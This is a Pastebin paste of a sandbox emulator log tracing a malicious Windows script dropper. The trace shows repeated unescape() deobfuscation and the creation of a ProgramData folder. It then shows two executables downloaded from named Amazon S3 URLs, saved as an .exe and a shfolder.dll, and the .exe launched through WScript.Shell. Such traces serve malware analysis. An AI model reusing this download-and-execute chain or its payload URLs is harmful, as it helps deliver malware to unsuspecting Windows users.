Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 6 Mar 17:16:10 - ActiveXObject(WScript.Shell)
- 6 Mar 17:16:10 - new WScript.Shell[14]
- 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
- 6 Mar 17:16:10 - new Scripting.FileSystemObject[15]
- 6 Mar 17:16:10 - new DriveObject[16](C:)
- 6 Mar 17:16:10 - DriveObject[16](C:).name = (string) 'C:'
- 6 Mar 17:16:10 - new Collection[17]
- 6 Mar 17:16:10 - Calling unescape() no.: 13
- 6 Mar 17:16:10 - Calling unescape() no.: 14
- 6 Mar 17:16:10 - Calling unescape() no.: 15
- 6 Mar 17:16:10 - Calling unescape() no.: 16
- 6 Mar 17:16:10 - Calling unescape() no.: 17
- 6 Mar 17:16:10 - Calling unescape() no.: 18
- 6 Mar 17:16:10 - Calling unescape() no.: 19
- 6 Mar 17:16:10 - Calling unescape() no.: 20
- 6 Mar 17:16:10 - Calling unescape() no.: 21
- 6 Mar 17:16:10 - Calling unescape() no.: 22
- 6 Mar 17:16:10 - Calling unescape() no.: 23
- 6 Mar 17:16:10 - Calling unescape() no.: 24
- 6 Mar 17:16:10 - Calling unescape() no.: 25
- 6 Mar 17:16:10 - Calling unescape() no.: 26
- 6 Mar 17:16:10 - Calling unescape() no.: 27
- 6 Mar 17:16:10 - Calling unescape() no.: 28
- 6 Mar 17:16:10 - Calling unescape() no.: 29
- 6 Mar 17:16:10 - Calling unescape() no.: 30
- 6 Mar 17:16:10 - Calling unescape() no.: 31
- 6 Mar 17:16:10 - Calling unescape() no.: 32
- 6 Mar 17:16:10 - Calling unescape() no.: 33
- 6 Mar 17:16:10 - Calling unescape() no.: 34
- 6 Mar 17:16:10 - Calling unescape() no.: 35
- 6 Mar 17:16:10 - Scripting.FileSystemObject[15].FileExists(C:\\ProgramData\\abc123) => false
- 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
- 6 Mar 17:16:10 - new Scripting.FileSystemObject[18]
- 6 Mar 17:16:10 - new DriveObject[19](C:)
- 6 Mar 17:16:10 - DriveObject[19](C:).name = (string) 'C:'
- 6 Mar 17:16:10 - new Collection[20]
- 6 Mar 17:16:10 - Calling unescape() no.: 36
- 6 Mar 17:16:10 - Calling unescape() no.: 37
- 6 Mar 17:16:10 - Calling unescape() no.: 38
- 6 Mar 17:16:10 - Calling unescape() no.: 39
- 6 Mar 17:16:10 - Calling unescape() no.: 40
- 6 Mar 17:16:10 - Calling unescape() no.: 41
- 6 Mar 17:16:10 - Calling unescape() no.: 42
- 6 Mar 17:16:10 - Calling unescape() no.: 43
- 6 Mar 17:16:10 - Calling unescape() no.: 44
- 6 Mar 17:16:10 - Calling unescape() no.: 45
- 6 Mar 17:16:10 - Calling unescape() no.: 46
- 6 Mar 17:16:10 - Calling unescape() no.: 47
- 6 Mar 17:16:10 - Calling unescape() no.: 48
- 6 Mar 17:16:10 - Calling unescape() no.: 49
- 6 Mar 17:16:10 - Calling unescape() no.: 50
- 6 Mar 17:16:10 - Calling unescape() no.: 51
- 6 Mar 17:16:10 - Calling unescape() no.: 52
- 6 Mar 17:16:10 - Scripting.FileSystemObject[18].CreateFolder(C:\\ProgramData\\JQD2T4NFOFL9BW1)
- 6 Mar 17:16:10 - new FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1)
- 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).name = (string) 'C:\\ProgramData\\JQD2T4NFOFL9BW1'
- 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).parentfolder = (string) 'C:\ProgramData'
- 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
- 6 Mar 17:16:10 - new Scripting.FileSystemObject[22]
- 6 Mar 17:16:10 - new DriveObject[23](C:)
- 6 Mar 17:16:10 - DriveObject[23](C:).name = (string) 'C:'
- 6 Mar 17:16:10 - new Collection[24]
- 6 Mar 17:16:10 - Calling unescape() no.: 53
- 6 Mar 17:16:10 - Calling unescape() no.: 54
- 6 Mar 17:16:10 - Calling unescape() no.: 55
- 6 Mar 17:16:10 - Calling unescape() no.: 56
- 6 Mar 17:16:10 - Calling unescape() no.: 57
- 6 Mar 17:16:10 - Calling unescape() no.: 58
- 6 Mar 17:16:10 - Calling unescape() no.: 59
- 6 Mar 17:16:10 - Calling unescape() no.: 60
- 6 Mar 17:16:10 - Calling unescape() no.: 61
- 6 Mar 17:16:10 - Calling unescape() no.: 62
- 6 Mar 17:16:10 - Calling unescape() no.: 63
- 6 Mar 17:16:10 - Calling unescape() no.: 64
- 6 Mar 17:16:10 - Calling unescape() no.: 65
- 6 Mar 17:16:10 - Calling unescape() no.: 66
- 6 Mar 17:16:10 - Calling unescape() no.: 67
- 6 Mar 17:16:10 - Calling unescape() no.: 68
- 6 Mar 17:16:10 - Calling unescape() no.: 69
- 6 Mar 17:16:10 - Calling unescape() no.: 70
- 6 Mar 17:16:10 - Calling unescape() no.: 71
- 6 Mar 17:16:10 - Calling unescape() no.: 72
- 6 Mar 17:16:10 - Calling unescape() no.: 73
- 6 Mar 17:16:10 - Calling unescape() no.: 74
- 6 Mar 17:16:10 - Calling unescape() no.: 75
- 6 Mar 17:16:10 - Scripting.FileSystemObject[22].CreateTextFile(C:\\ProgramData\\abc123)
- 6 Mar 17:16:10 - new TextStream[25]
- 6 Mar 17:16:10 - TextStream[25].WriteLine(kroicf)
- 6 Mar 17:16:10 - FS.writeFile(C:\\ProgramData\\abc123, kroicf??)
- 6 Mar 17:16:10 - TextStream[25].Close()
- 6 Mar 17:16:10 - Calling unescape() no.: 76
- 6 Mar 17:16:10 - Calling unescape() no.: 77
- 6 Mar 17:16:10 - Calling unescape() no.: 78
- 6 Mar 17:16:10 - Calling unescape() no.: 79
- 6 Mar 17:16:10 - Calling unescape() no.: 80
- 6 Mar 17:16:10 - Calling unescape() no.: 81
- 6 Mar 17:16:10 - Calling unescape() no.: 82
- 6 Mar 17:16:10 - Calling unescape() no.: 83
- 6 Mar 17:16:10 - Calling unescape() no.: 84
- 6 Mar 17:16:10 - Calling unescape() no.: 85
- 6 Mar 17:16:10 - Calling unescape() no.: 86
- 6 Mar 17:16:10 - Calling unescape() no.: 87
- 6 Mar 17:16:10 - Calling unescape() no.: 88
- 6 Mar 17:16:10 - Calling unescape() no.: 89
- 6 Mar 17:16:10 - Calling unescape() no.: 90
- 6 Mar 17:16:10 - Calling unescape() no.: 91
- 6 Mar 17:16:10 - Calling unescape() no.: 92
- 6 Mar 17:16:10 - Calling unescape() no.: 93
- 6 Mar 17:16:10 - Calling unescape() no.: 94
- 6 Mar 17:16:10 - Calling unescape() no.: 95
- 6 Mar 17:16:10 - Calling unescape() no.: 96
- 6 Mar 17:16:10 - Calling unescape() no.: 97
- 6 Mar 17:16:10 - Calling unescape() no.: 98
- 6 Mar 17:16:10 - Calling unescape() no.: 99
- 6 Mar 17:16:10 - Calling unescape() no.: 100
- 6 Mar 17:16:10 - Calling unescape() no.: 101
- 6 Mar 17:16:10 - Calling unescape() no.: 102
- 6 Mar 17:16:10 - Calling unescape() no.: 103
- 6 Mar 17:16:10 - Calling unescape() no.: 104
- 6 Mar 17:16:10 - Calling unescape() no.: 105
- 6 Mar 17:16:10 - Calling unescape() no.: 106
- 6 Mar 17:16:10 - Calling unescape() no.: 107
- 6 Mar 17:16:10 - Calling unescape() no.: 108
- 6 Mar 17:16:10 - Calling unescape() no.: 109
- 6 Mar 17:16:10 - Calling unescape() no.: 110
- 6 Mar 17:16:10 - Calling unescape() no.: 111
- 6 Mar 17:16:10 - Calling unescape() no.: 112
- 6 Mar 17:16:10 - Calling unescape() no.: 113
- 6 Mar 17:16:10 - Calling unescape() no.: 114
- 6 Mar 17:16:10 - Calling unescape() no.: 115
- 6 Mar 17:16:10 - Calling unescape() no.: 116
- 6 Mar 17:16:10 - Calling unescape() no.: 117
- 6 Mar 17:16:10 - Calling unescape() no.: 118
- 6 Mar 17:16:10 - Calling unescape() no.: 119
- 6 Mar 17:16:10 - Calling unescape() no.: 120
- 6 Mar 17:16:10 - Calling unescape() no.: 121
- 6 Mar 17:16:10 - Calling unescape() no.: 122
- 6 Mar 17:16:10 - Calling unescape() no.: 123
- 6 Mar 17:16:10 - Calling unescape() no.: 124
- 6 Mar 17:16:10 - Calling unescape() no.: 125
- 6 Mar 17:16:10 - Calling unescape() no.: 126
- 6 Mar 17:16:10 - Calling unescape() no.: 127
- 6 Mar 17:16:10 - Calling unescape() no.: 128
- 6 Mar 17:16:10 - Calling unescape() no.: 129
- 6 Mar 17:16:10 - Calling unescape() no.: 130
- 6 Mar 17:16:10 - Calling unescape() no.: 131
- 6 Mar 17:16:10 - Calling unescape() no.: 132
- 6 Mar 17:16:10 - Calling unescape() no.: 133
- 6 Mar 17:16:10 - Calling unescape() no.: 134
- 6 Mar 17:16:10 - Calling unescape() no.: 135
- 6 Mar 17:16:10 - Calling unescape() no.: 136
- 6 Mar 17:16:10 - Calling unescape() no.: 137
- 6 Mar 17:16:10 - Calling unescape() no.: 138
- 6 Mar 17:16:10 - Calling unescape() no.: 139
- 6 Mar 17:16:10 - Calling unescape() no.: 140
- 6 Mar 17:16:10 - Calling unescape() no.: 141
- 6 Mar 17:16:10 - Calling unescape() no.: 142
- 6 Mar 17:16:10 - Calling unescape() no.: 143
- 6 Mar 17:16:10 - Calling unescape() no.: 144
- 6 Mar 17:16:10 - Calling unescape() no.: 145
- 6 Mar 17:16:10 - Calling unescape() no.: 146
- 6 Mar 17:16:10 - Calling unescape() no.: 147
- 6 Mar 17:16:10 - Calling unescape() no.: 148
- 6 Mar 17:16:10 - Calling unescape() no.: 149
- 6 Mar 17:16:10 - Calling unescape() no.: 150
- 6 Mar 17:16:10 - ActiveXObject(MSXML2.XMLHTTP)
- 6 Mar 17:16:10 - new MSXML2.XMLHTTP[26]
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].onreadystatechange = (undefined) 'undefined'
- 6 Mar 17:16:10 - ActiveXObject(ADODB.Stream)
- 6 Mar 17:16:10 - new ADODB_Stream[27]
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh,false)
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method = (string) 'GET'
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].async = (boolean) 'false'
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].send(undefined)
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method.get() => (string) 'GET'
- 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status = (number) '200'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].readystate = (number) '4'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext = (string) 'OK'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders = (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status.get() => (number) '200'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders.get() => (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext.get() => (string) 'OK'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].onreadystatechange.get() => (undefined) 'undefined'
- 6 Mar 17:16:17 - ADODB_Stream[27].type = (number) '1'
- 6 Mar 17:16:17 - ADODB_Stream[27].Open()
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
- 6 Mar 17:16:17 - ADODB_Stream[27].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
- 6 Mar 17:16:17 - ADODB_Stream[27].Write(str) - 400872 bytes
- 6 Mar 17:16:17 - ADODB_Stream[27].size = (number) '400872'
- 6 Mar 17:16:17 - ADODB_Stream[27].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe, 2)
- 6 Mar 17:16:17 - ADODB_Stream[27].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
- 6 Mar 17:16:17 - Calling unescape() no.: 151
- 6 Mar 17:16:17 - Calling unescape() no.: 152
- 6 Mar 17:16:17 - Calling unescape() no.: 153
- 6 Mar 17:16:17 - Calling unescape() no.: 154
- 6 Mar 17:16:17 - Calling unescape() no.: 155
- 6 Mar 17:16:17 - Calling unescape() no.: 156
- 6 Mar 17:16:17 - Calling unescape() no.: 157
- 6 Mar 17:16:17 - Calling unescape() no.: 158
- 6 Mar 17:16:17 - Calling unescape() no.: 159
- 6 Mar 17:16:17 - Calling unescape() no.: 160
- 6 Mar 17:16:17 - Calling unescape() no.: 161
- 6 Mar 17:16:17 - Calling unescape() no.: 162
- 6 Mar 17:16:17 - Calling unescape() no.: 163
- 6 Mar 17:16:17 - Calling unescape() no.: 164
- 6 Mar 17:16:17 - Calling unescape() no.: 165
- 6 Mar 17:16:17 - Calling unescape() no.: 166
- 6 Mar 17:16:17 - Calling unescape() no.: 167
- 6 Mar 17:16:17 - Calling unescape() no.: 168
- 6 Mar 17:16:17 - Calling unescape() no.: 169
- 6 Mar 17:16:17 - Calling unescape() no.: 170
- 6 Mar 17:16:17 - Calling unescape() no.: 171
- 6 Mar 17:16:17 - Calling unescape() no.: 172
- 6 Mar 17:16:17 - Calling unescape() no.: 173
- 6 Mar 17:16:17 - Calling unescape() no.: 174
- 6 Mar 17:16:17 - Calling unescape() no.: 175
- 6 Mar 17:16:17 - Calling unescape() no.: 176
- 6 Mar 17:16:17 - Calling unescape() no.: 177
- 6 Mar 17:16:17 - Calling unescape() no.: 178
- 6 Mar 17:16:17 - Calling unescape() no.: 179
- 6 Mar 17:16:17 - Calling unescape() no.: 180
- 6 Mar 17:16:17 - Calling unescape() no.: 181
- 6 Mar 17:16:17 - Calling unescape() no.: 182
- 6 Mar 17:16:17 - Calling unescape() no.: 183
- 6 Mar 17:16:17 - Calling unescape() no.: 184
- 6 Mar 17:16:17 - Calling unescape() no.: 185
- 6 Mar 17:16:17 - Calling unescape() no.: 186
- 6 Mar 17:16:17 - Calling unescape() no.: 187
- 6 Mar 17:16:17 - Calling unescape() no.: 188
- 6 Mar 17:16:17 - Calling unescape() no.: 189
- 6 Mar 17:16:17 - Calling unescape() no.: 190
- 6 Mar 17:16:17 - Calling unescape() no.: 191
- 6 Mar 17:16:17 - Calling unescape() no.: 192
- 6 Mar 17:16:17 - Calling unescape() no.: 193
- 6 Mar 17:16:17 - Calling unescape() no.: 194
- 6 Mar 17:16:17 - Calling unescape() no.: 195
- 6 Mar 17:16:17 - Calling unescape() no.: 196
- 6 Mar 17:16:17 - Calling unescape() no.: 197
- 6 Mar 17:16:17 - Calling unescape() no.: 198
- 6 Mar 17:16:17 - Calling unescape() no.: 199
- 6 Mar 17:16:17 - Calling unescape() no.: 200
- 6 Mar 17:16:17 - Calling unescape() no.: 201
- 6 Mar 17:16:17 - Calling unescape() no.: 202
- 6 Mar 17:16:17 - Calling unescape() no.: 203
- 6 Mar 17:16:17 - Calling unescape() no.: 204
- 6 Mar 17:16:17 - Calling unescape() no.: 205
- 6 Mar 17:16:17 - Calling unescape() no.: 206
- 6 Mar 17:16:17 - Calling unescape() no.: 207
- 6 Mar 17:16:17 - Calling unescape() no.: 208
- 6 Mar 17:16:17 - Calling unescape() no.: 209
- 6 Mar 17:16:17 - Calling unescape() no.: 210
- 6 Mar 17:16:17 - Calling unescape() no.: 211
- 6 Mar 17:16:17 - Calling unescape() no.: 212
- 6 Mar 17:16:17 - Calling unescape() no.: 213
- 6 Mar 17:16:17 - Calling unescape() no.: 214
- 6 Mar 17:16:17 - Calling unescape() no.: 215
- 6 Mar 17:16:17 - Calling unescape() no.: 216
- 6 Mar 17:16:17 - Calling unescape() no.: 217
- 6 Mar 17:16:17 - Calling unescape() no.: 218
- 6 Mar 17:16:17 - Calling unescape() no.: 219
- 6 Mar 17:16:17 - Calling unescape() no.: 220
- 6 Mar 17:16:17 - Calling unescape() no.: 221
- 6 Mar 17:16:17 - Calling unescape() no.: 222
- 6 Mar 17:16:17 - Calling unescape() no.: 223
- 6 Mar 17:16:17 - Calling unescape() no.: 224
- 6 Mar 17:16:17 - Calling unescape() no.: 225
- 6 Mar 17:16:17 - ActiveXObject(MSXML2.XMLHTTP)
- 6 Mar 17:16:17 - new MSXML2.XMLHTTP[28]
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].onreadystatechange = (undefined) 'undefined'
- 6 Mar 17:16:17 - ActiveXObject(ADODB.Stream)
- 6 Mar 17:16:17 - new ADODB_Stream[29]
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus,false)
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method = (string) 'GET'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].async = (boolean) 'false'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].send(undefined)
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method.get() => (string) 'GET'
- 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status = (number) '200'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].readystate = (number) '4'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext = (string) 'OK'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders = (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status.get() => (number) '200'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders.get() => (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext.get() => (string) 'OK'
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].onreadystatechange.get() => (undefined) 'undefined'
- 6 Mar 17:16:36 - ADODB_Stream[29].type = (number) '1'
- 6 Mar 17:16:36 - ADODB_Stream[29].Open()
- 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
- 6 Mar 17:16:37 - ADODB_Stream[29].content = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
- 6 Mar 17:16:37 - ADODB_Stream[29].Write(str) - 5845088 bytes
- 6 Mar 17:16:37 - ADODB_Stream[29].size = (number) '5845088'
- 6 Mar 17:16:37 - ADODB_Stream[29].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\shfolder.dll, 2)
- 6 Mar 17:16:37 - ADODB_Stream[29].content.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
- 6 Mar 17:16:37 - WScript.Sleep(11000)
- 6 Mar 17:16:48 - ActiveXObject(WScript.Shell)
- 6 Mar 17:16:48 - new WScript.Shell[30]
- 6 Mar 17:16:48 - Calling unescape() no.: 226
- 6 Mar 17:16:48 - Calling unescape() no.: 227
- 6 Mar 17:16:48 - Calling unescape() no.: 228
- 6 Mar 17:16:48 - Calling unescape() no.: 229
- 6 Mar 17:16:48 - Calling unescape() no.: 230
- 6 Mar 17:16:48 - Calling unescape() no.: 231
- 6 Mar 17:16:48 - Calling unescape() no.: 232
- 6 Mar 17:16:48 - Calling unescape() no.: 233
- 6 Mar 17:16:48 - Calling unescape() no.: 234
- 6 Mar 17:16:48 - Calling unescape() no.: 235
- 6 Mar 17:16:48 - Calling unescape() no.: 236
- 6 Mar 17:16:48 - Calling unescape() no.: 237
- 6 Mar 17:16:48 - Calling unescape() no.: 238
- 6 Mar 17:16:48 - Calling unescape() no.: 239
- 6 Mar 17:16:48 - Calling unescape() no.: 240
- 6 Mar 17:16:48 - Calling unescape() no.: 241
- 6 Mar 17:16:48 - Calling unescape() no.: 242
- 6 Mar 17:16:48 - Calling unescape() no.: 243
- 6 Mar 17:16:48 - WScript.Shell[30].Exec(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
- 6 Mar 17:16:48 - new Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
- 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).processid = (number) '31'
- 6 Mar 17:16:48 - new TextStream[32]
- 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdout = (object) 'TextStream[32]'
- 6 Mar 17:16:48 - new TextStream[33]
- 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stderr = (object) 'TextStream[33]'
- 6 Mar 17:16:48 - new TextStream[34]
- 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdin = (object) 'TextStream[34]'
- 6 Mar 17:16:48 - ==> Cleaning up sandbox.
- 6 Mar 17:16:48 - ==> Script execution finished, dumping sandbox environment to a file.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement